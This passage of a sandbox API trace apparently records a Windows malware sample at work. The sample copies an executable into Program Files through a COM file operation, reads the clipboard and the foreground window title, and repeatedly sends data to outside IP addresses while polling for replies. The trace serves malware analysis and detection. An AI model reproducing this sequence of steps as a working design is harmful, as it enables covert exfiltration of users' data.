Buffer=0x10e8796c*, Length=0x99000, ByteOffset=0x1285f8b8*=0, Key=0x0 | out: IoStatusBlock=0x1285f8c0, Buffer=0x10e8796c*) returned 0x0 [0287.442] NtClose (Handle=0x22c0) returned 0x0 [0287.528] CoInitializeEx (pvReserved=0x0, dwCoInit=0x6) returned 0x0 [0287.529] CoCreateInstance (in: rclsid=0x8f10ae6*(Data1=0x3ad05575, Data2=0x8857, Data3=0x4850, Data4=([0]=0x92, [1]=0x77, [2]=0x11, [3]=0xb8, [4]=0x5b, [5]=0xdb, [6]=0x8e, [7]=0x9)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x8f10af6*(Data1=0x947aab5f, Data2=0xa5c, Data3=0x4c13, Data4=([0]=0xb4, [1]=0xd6, [2]=0x4b, [3]=0xf7, [4]=0x83, [5]=0x6f, [6]=0xc9, [7]=0xf8)), ppv=0x1285fe10 | out: ppv=0x1285fe10*=0xb00a810) returned 0x0 [0287.532] FileOperation:IFileOperation:SetOperationFlags (This=0xb00a810, dwOperationFlags=0x10840414) returned 0x0 [0287.532] SHCreateItemFromParsingName (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Xmpxd9", pbc=0x0, riid=0x8f10ad6*(Data1=0x43826d1e, Data2=0xe718, Data3=0x42ee, Data4=([0]=0xbc, [1]=0x55, [2]=0xa1, [3]=0xe2, [4]=0x61, [5]=0xc3, [6]=0x7b, [7]=0xfe)), ppv=0x1285fe28 | out: ppv=0x1285fe28*=0xb062318) returned 0x0 [0287.570] SHCreateItemFromParsingName (in: pszPath="C:\\Program Files (x86)", pbc=0x0, riid=0x8f10ad6*(Data1=0x43826d1e, Data2=0xe718, Data3=0x42ee, Data4=([0]=0xbc, [1]=0x55, [2]=0xa1, [3]=0xe2, [4]=0x61, [5]=0xc3, [6]=0x7b, [7]=0xfe)), ppv=0x1285fe20 | out: ppv=0x1285fe20*=0xb062cb8) returned 0x0 [0287.573] FileOperation:IFileOperation:CopyItem (This=0xb00a810, psiItem=0xb062318, psiDestinationFolder=0xb062cb8, pszCopyName="Xmpxd9", pfopsItem=0x0) returned 0x0 [0287.574] FileOperation:IFileOperation:PerformOperations (This=0xb00a810) returned 0x0 [0304.254] FileOperation:IUnknown:Release (This=0xb062cb8) returned 0x2 [0304.254] FileOperation:IUnknown:Release (This=0xb062318) returned 0x0 [0304.255] FileOperation:IUnknown:Release (This=0xb00a810) returned 0x2 [0304.255] CoUninitialize () [0304.304] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285f910, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.308] NtDeleteFile (ObjectAttributes=0x1285f920*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0)) returned 0x0 [0304.316] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285f910, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.316] NtCreateFile (in: FileHandle=0x1285f8b0, DesiredAccess=0x120089, ObjectAttributes=0x1285f920*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285f8c0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285f8b0*=0x2310, IoStatusBlock=0x1285f8c0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0304.316] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285f830 | out: HeapArray=0x1285f830*=0x570000) returned 0x6 [0304.317] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da270) returned 1 [0304.317] NtQueryInformationFile (in: FileHandle=0x2310, IoStatusBlock=0x1285f8c0, FileInformation=0x1285f8d0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285f8c0, FileInformation=0x1285f8d0) returned 0x0 [0304.317] NtClose (Handle=0x2310) returned 0x0 [0304.317] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.317] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xffffffffffffffff, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0304.317] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0304.317] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9e80) returned 1 [0304.317] OpenClipboard (hWndNewOwner=0x0) returned 1 [0304.317] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0304.318] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0304.318] GetForegroundWindow () returned 0x2013a [0304.318] GetWindowTextW (in: hWnd=0x2013a, lpString=0x8f142a2, nMaxCount=260 | out: lpString="Blank Page - Internet Explorer") returned 30 [0304.318] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0304.318] CloseClipboard () returned 1 [0304.319] socket (af=2, type=1, protocol=6) returned 0x2310 [0304.320] connect (s=0x2310, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0304.383] RtlIntegerToChar (in: Value=0xca1, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="3233") returned 0x0 [0304.383] send (s=0x2310, buf=0x8f1cf22*, len=3648, flags=0) returned 3648 [0304.384] closesocket (s=0x2310) returned 0 [0304.385] socket (af=2, type=1, protocol=6) returned 0x2310 [0304.385] connect (s=0x2310, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0304.556] RtlIntegerToChar (in: Value=0x14d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="333") returned 0x0 [0304.556] send (s=0x2310, buf=0x8f1cf22*, len=747, flags=0) returned 747 [0304.556] closesocket (s=0x2310) returned 0 [0304.559] socket (af=2, type=1, protocol=6) returned 0x2310 [0304.559] connect (s=0x2310, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0304.743] RtlIntegerToChar (in: Value=0xc771, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="51057") returned 0x0 [0304.744] send (s=0x2310, buf=0x1167b56c*, len=51473, flags=0) returned 51473 [0304.745] closesocket (s=0x2310) returned 0 [0304.785] socket (af=2, type=1, protocol=6) returned 0x2310 [0304.785] connect (s=0x2310, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0304.852] RtlIntegerToChar (in: Value=0xe3939, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="932153") returned 0x0 [0304.860] send (s=0x2310, buf=0x1167b56c*, len=932566, flags=0) returned 932566 [0304.872] closesocket (s=0x2310) returned 0 [0304.873] socket (af=2, type=1, protocol=6) returned 0x2310 [0304.873] connect (s=0x2310, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0304.939] send (s=0x2310, buf=0x8f3a322*, len=176, flags=0) returned 176 [0304.939] setsockopt (s=0x2310, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0304.939] recv (in: s=0x2310, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 5276 [0305.113] closesocket (s=0x2310) returned 0 [0305.113] Sleep (dwMilliseconds=0x1388) [0305.115] OpenClipboard (hWndNewOwner=0x0) returned 1 [0305.115] GetClipboardData (uFormat=0xd) returned 0xafaa5a0 [0305.115] GlobalLock (hMem=0xafaa5a0) returned 0xafaa5a0 [0305.116] GlobalUnlock (hMem=0xafaa5a0) returned 1 [0305.116] CloseClipboard () returned 1 [0305.116] socket (af=2, type=1, protocol=6) returned 0x2310 [0305.116] connect (s=0x2310, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0305.254] RtlIntegerToChar (in: Value=0xca1, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="3233") returned 0x0 [0305.254] send (s=0x2310, buf=0x8f1cf22*, len=3639, flags=0) returned 3639 [0305.255] closesocket (s=0x2310) returned 0 [0305.256] socket (af=2, type=1, protocol=6) returned 0x2310 [0305.256] connect (s=0x2310, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0305.405] RtlIntegerToChar (in: Value=0x14d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="333") returned 0x0 [0305.405] send (s=0x2310, buf=0x8f1cf22*, len=738, flags=0) returned 738 [0305.406] closesocket (s=0x2310) returned 0 [0305.407] socket (af=2, type=1, protocol=6) returned 0x2310 [0305.407] connect (s=0x2310, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0305.558] RtlIntegerToChar (in: Value=0xc771, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="51057") returned 0x0 [0305.559] send (s=0x2310, buf=0x1167b56c*, len=51464, flags=0) returned 51464 [0305.560] closesocket (s=0x2310) returned 0 [0305.561] socket (af=2, type=1, protocol=6) returned 0x2310 [0305.561] connect (s=0x2310, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0305.713] RtlIntegerToChar (in: Value=0xe3939, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="932153") returned 0x0 [0305.725] send (s=0x2310, buf=0x1167b56c*, len=932557, flags=0) returned 932557 [0305.754] closesocket (s=0x2310) returned 0 [0305.755] socket (af=2, type=1, protocol=6) returned 0x2310 [0305.755] connect (s=0x2310, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0306.144] send (s=0x2310, buf=0x8f3a322*, len=173, flags=0) returned 173 [0306.144] setsockopt (s=0x2310, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0306.145] recv (in: s=0x2310, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0306.645] closesocket (s=0x2310) returned 0 [0306.646] Sleep (dwMilliseconds=0x1388) [0306.647] OpenClipboard (hWndNewOwner=0x0) returned 1 [0306.647] GetClipboardData (uFormat=0xd) returned 0xafaa7d0 [0306.647] GlobalLock (hMem=0xafaa7d0) returned 0xafaa7d0 [0306.647] GlobalUnlock (hMem=0xafaa7d0) returned 1 [0306.647] CloseClipboard () returned 1 [0306.647] socket (af=2, type=1, protocol=6) returned 0x2310 [0306.648] connect (s=0x2310, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0306.686] RtlIntegerToChar (in: Value=0xca1, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="3233") returned 0x0 [0306.686] send (s=0x2310, buf=0x8f1cf22*, len=3681, flags=0) returned 3681 [0306.687] closesocket (s=0x2310) returned 0 [0306.687] socket (af=2, type=1, protocol=6) returned 0x2310 [0306.687] connect (s=0x2310, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0306.731] RtlIntegerToChar (in: Value=0x14d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="333") returned 0x0 [0306.731] send (s=0x2310, buf=0x8f1cf22*, len=780, flags=0) returned 780 [0306.732] closesocket (s=0x2310) returned 0 [0306.733] socket (af=2, type=1, protocol=6) returned 0x2310 [0306.733] connect (s=0x2310, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0306.774] RtlIntegerToChar (in: Value=0xc771, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="51057") returned 0x0 [0306.775] send (s=0x2310, buf=0x1167b56c*, len=51506, flags=0) returned 51506 [0306.777] closesocket (s=0x2310) returned 0 [0306.778] socket (af=2, type=1, protocol=6) returned 0x2310 [0306.778] connect (s=0x2310, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0306.838] RtlIntegerToChar (in: Value=0xe3939, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="932153") returned 0x0 [0306.847] send (s=0x2310, buf=0x1167b56c*, len=932599, flags=0) returned 932599 [0306.860] closesocket (s=0x2310) returned 0 [0306.860] socket (af=2, type=1, protocol=6) returned 0x2310 [0306.860] connect (s=0x2310, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0306.906] send (s=0x2310, buf=0x8f3a322*, len=187, flags=0) returned 187 [0306.907] setsockopt (s=0x2310, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0306.907] recv (in: s=0x2310, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 4225 [0306.988] closesocket (s=0x2310) returned 0 [0306.989] Sleep (dwMilliseconds=0x1388) [0306.990] Sleep (dwMilliseconds=0x1388) [0306.992] Sleep (dwMilliseconds=0x1388) [0306.993] Sleep (dwMilliseconds=0x1388) [0306.995] Sleep (dwMilliseconds=0x1388) [0306.996] Sleep (dwMilliseconds=0x1388) [0306.998] Sleep (dwMilliseconds=0x1388) [0306.999] Sleep (dwMilliseconds=0x1388) [0307.001] Sleep (dwMilliseconds=0x1388) [0307.002] Sleep (dwMilliseconds=0x1388) [0307.004] Sleep (dwMilliseconds=0x1388) [0307.122] Sleep (dwMilliseconds=0x1388) [0307.124] Sleep (dwMilliseconds=0x1388) [0307.126] Sleep (dwMilliseconds=0x1388) [0307.127] Sleep (dwMilliseconds=0x1388) [0307.143] Sleep (dwMilliseconds=0x1388) [0307.144] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0307.144] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x2310, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0307.145] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0307.145] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da970) returned 1 [0307.145] NtQueryInformationFile (in: FileHandle=0x2310, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0307.145] NtClose (Handle=0x2310) returned 0x0 [0307.145] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0307.145] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xffffffffffffffff, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0307.145] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0307.145] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d96a0) returned 1 [0307.145] Sleep (dwMilliseconds=0x1388) [0307.147] Sleep (dwMilliseconds=0x1388) [0307.148] Sleep (dwMilliseconds=0x1388) [0307.151] Sleep (dwMilliseconds=0x1388) [0307.153] Sleep (dwMilliseconds=0x1388) [0307.154] Sleep (dwMilliseconds=0x1388) [0307.156] Sleep (dwMilliseconds=0x1388) [0307.157] Sleep (dwMilliseconds=0x1388) [0307.159] Sleep (dwMilliseconds=0x1388) [0307.160] Sleep (dwMilliseconds=0x1388) [0307.162] Sleep (dwMilliseconds=0x1388) [0307.163] Sleep (dwMilliseconds=0x1388) [0307.165] Sleep (dwMilliseconds=0x1388) [0307.166] Sleep (dwMilliseconds=0x1388) [0307.168] Sleep (dwMilliseconds=0x1388) [0307.169] Sleep (dwMilliseconds=0x1388) [0307.171] Sleep (dwMilliseconds=0x1388) [0307.172] Sleep (dwMilliseconds=0x1388) [0307.220] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0307.220] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1d00, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0307.220] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0307.220] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9b70) returned 1 [0307.221] NtQueryInformationFile (in: FileHandle=0x1d00, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0307.221] NtClose (Handle=0x1d00) returned 0x0 [0307.221] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0307.221] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xffffffffffffffff, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0307.221] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0307.221] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da820) returned 1 [0307.221] Sleep (dwMilliseconds=0x1388) [0307.222] Sleep (dwMilliseconds=0x1388) [0307.737] Sleep (dwMilliseconds=0x1388) [0307.738] Sleep (dwMilliseconds=0x1388) [0307.740] Sleep (dwMilliseconds=0x1388) [0307.741] Sleep (dwMilliseconds=0x1388) [0307.744] Sleep (dwMilliseconds=0x1388) [0307.771] Sleep (dwMilliseconds=0x1388) [0307.773] Sleep (dwMilliseconds=0x1388) [0307.774] Sleep (dwMilliseconds=0x1388) [0307.776] Sleep (dwMilliseconds=0x1388) [0307.777] Sleep (dwMilliseconds=0x1388) [0307.779] Sleep (dwMilliseconds=0x1388) [0307.780] Sleep (dwMilliseconds=0x1388) [0307.782] Sleep (dwMilliseconds=0x1388) [0307.783] Sleep (dwMilliseconds=0x1388) [0307.963] Sleep (dwMilliseconds=0x1388) [0307.965] Sleep (dwMilliseconds=0x1388) [0307.966] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0307.966] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1a68, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0307.967] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0307.967] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9e80) returned 1 [0307.967] NtQueryInformationFile (in: FileHandle=0x1a68, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0307.967] NtClose (Handle=0x1a68) returned 0x0 [0307.967] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0307.967] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xffffffffffffffff, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0307.967] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0307.967] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9470) returned 1 [0307.967] Sleep (dwMilliseconds=0x1388) [0307.969] Sleep (dwMilliseconds=0x1388) [0307.971] Sleep (dwMilliseconds=0x1388) [0307.973] Sleep (dwMilliseconds=0x1388) [0307.975] Sleep (dwMilliseconds=0x1388) [0307.976] Sleep (dwMilliseconds=0x1388) [0307.978] Sleep (dwMilliseconds=0x1388) [0307.980] Sleep (dwMilliseconds=0x1388) [0308.052] Sleep (dwMilliseconds=0x1388) [0308.346] Sleep (dwMilliseconds=0x1388) [0308.347] Sleep (dwMilliseconds=0x1388) [0308.349] Sleep (dwMilliseconds=0x1388) [0308.351] Sleep (dwMilliseconds=0x1388) [0308.352] Sleep (dwMilliseconds=0x1388) [0308.354] Sleep (dwMilliseconds=0x1388) [0308.355] Sleep (dwMilliseconds=0x1388) [0308.357] Sleep (dwMilliseconds=0x1388) [0308.360] Sleep (dwMilliseconds=0x1388) [0308.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0308.362] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xca0, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0308.363] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0308.363] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1daa50) returned 1 [0308.363] NtQueryInformationFile (in: FileHandle=0xca0, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0308.363] NtClose (Handle=0xca0) returned 0x0 [0308.363] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0308.363] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xffffffffffffffff, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0308.363] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0308.363] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da350) returned 1 [0308.363] Sleep (dwMilliseconds=0x1388) [0308.366] Sleep (dwMilliseconds=0x1388) [0308.368] Sleep (dwMilliseconds=0x1388) [0308.473] Sleep (dwMilliseconds=0x1388) [0308.474] Sleep (dwMilliseconds=0x1388) [0308.476] Sleep (dwMilliseconds=0x1388) [0308.478] Sleep (dwMilliseconds=0x1388) [0308.479] Sleep (dwMilliseconds=0x1388) [0308.480] Sleep 